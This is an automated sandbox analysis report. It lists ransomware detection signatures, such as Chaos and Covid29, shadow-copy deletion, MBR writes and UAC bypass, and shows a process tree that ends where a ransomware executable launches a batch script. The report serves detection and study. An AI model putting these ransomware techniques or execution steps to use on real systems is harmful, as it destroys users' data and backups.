Analysis

  • max time kernel
    425s
  • max time network
    426s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 14:37

Errors

Reason
Machine shutdown

General

  • Target

    Sols RNG [Eon 1-1] - ROLLING OBLIVION IN GLITCH BIOME!!! (WITH REACTION) 480.mp4

  • Size

    8.1MB

  • MD5

    7a922dc11e75f0a29f8301a7c7618c2b

  • SHA1

    a147bf976557d00e7bf0dcbaf7e43fec5277d9e6

  • SHA256

    b20976ed9b7d2c8cab61375a83d302258858ee57b5f497a431763b1a8e9ca2dc

  • SHA512

    48e08ab89618b6eb4ef86929e5e176d103d9c28909cfeaa47e457e7a7233f2cf1886bcb07abd38dbddf7fae5b224312a8112061ec994b9a38e6980f1ed8c921b

  • SSDEEP

    196608:HsIcL0wGqPi/xOuRu40kE/afekLeZl4zuKQXlRSqesHnaE+YR:HHwbKc4FE/a3Sl1Xnx6EP

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • Chaos family
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • A potential corporate email address has been identified in the URL: [email protected]
  • A potential corporate email address has been identified in the URL: [email protected]
  • A potential corporate email address has been identified in the URL: [email protected]
  • A potential corporate email address has been identified in the URL: [email protected]
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Probable phishing domain 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\Sols RNG [Eon 1-1] - ROLLING OBLIVION IN GLITCH BIOME!!! (WITH REACTION) 480.mp4"
    1⤵
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:324
    • C:\Windows\SysWOW64\unregmp2.exe
      "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\system32\unregmp2.exe
        "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
        3⤵
        • Enumerates connected drives
        • Suspicious use of AdjustPrivilegeToken
        PID:1864
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
    1⤵
    • Drops file in Windows directory
    PID:816
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x498 0x510
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1468
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8688a46f8,0x7ff8688a4708,0x7ff8688a4718
      2⤵
        PID:2276
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        2⤵
          PID:1872
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:8
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
          2⤵
            PID:2428
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
            2⤵
              PID:1428
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
              2⤵
                PID:444
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
                2⤵
                  PID:4852
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:1
                  2⤵
                    PID:2652
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
                    2⤵
                      PID:708
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3160
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                      2⤵
                        PID:4588
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                        2⤵
                          PID:2096
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:1
                          2⤵
                            PID:4384
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
                            2⤵
                              PID:2340
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
                              2⤵
                                PID:3728
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
                                2⤵
                                  PID:4672
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1
                                  2⤵
                                    PID:4424
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                    2⤵
                                      PID:3984
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                                      2⤵
                                        PID:2368
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
                                        2⤵
                                          PID:4672
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
                                          2⤵
                                            PID:4972
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
                                            2⤵
                                              PID:3076
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2168 /prefetch:1
                                              2⤵
                                                PID:3512
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:1
                                                2⤵
                                                  PID:4672
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
                                                  2⤵
                                                    PID:3128
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
                                                    2⤵
                                                      PID:904
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
                                                      2⤵
                                                        PID:2084
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5932 /prefetch:8
                                                        2⤵
                                                          PID:876
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
                                                          2⤵
                                                            PID:3752
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
                                                            2⤵
                                                              PID:3148
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                                              2⤵
                                                                PID:3800
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                                                                2⤵
                                                                  PID:3760
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1
                                                                  2⤵
                                                                    PID:4752
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
                                                                    2⤵
                                                                      PID:3904
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
                                                                      2⤵
                                                                        PID:2192
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
                                                                        2⤵
                                                                          PID:4924
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1
                                                                          2⤵
                                                                            PID:3544
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:1
                                                                            2⤵
                                                                              PID:4416
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8
                                                                              2⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2724
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7304 /prefetch:8
                                                                              2⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2376
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7240 /prefetch:8
                                                                              2⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:3260
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
                                                                              2⤵
                                                                                PID:5180
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:1
                                                                                2⤵
                                                                                  PID:5188
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
                                                                                  2⤵
                                                                                    PID:5664
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
                                                                                    2⤵
                                                                                      PID:5672
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7428 /prefetch:2
                                                                                      2⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:5956
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2052
                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4880
                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                        1⤵
                                                                                          PID:2540
                                                                                        • C:\Users\Admin\Downloads\Covid29 Ransomware (1)\TrojanRansomCovid29.exe
                                                                                          "C:\Users\Admin\Downloads\Covid29 Ransomware (1)\TrojanRansomCovid29.exe"
                                                                                          1⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2212
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\TrojanRansomCovid29.bat" "
                                                                                            2⤵
                                                                                            • Checks computer location settings
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Modifies registry class
                                                                                            PID:3224
                                                                                            • C:\Windows\SysWOW64\WScript.exe
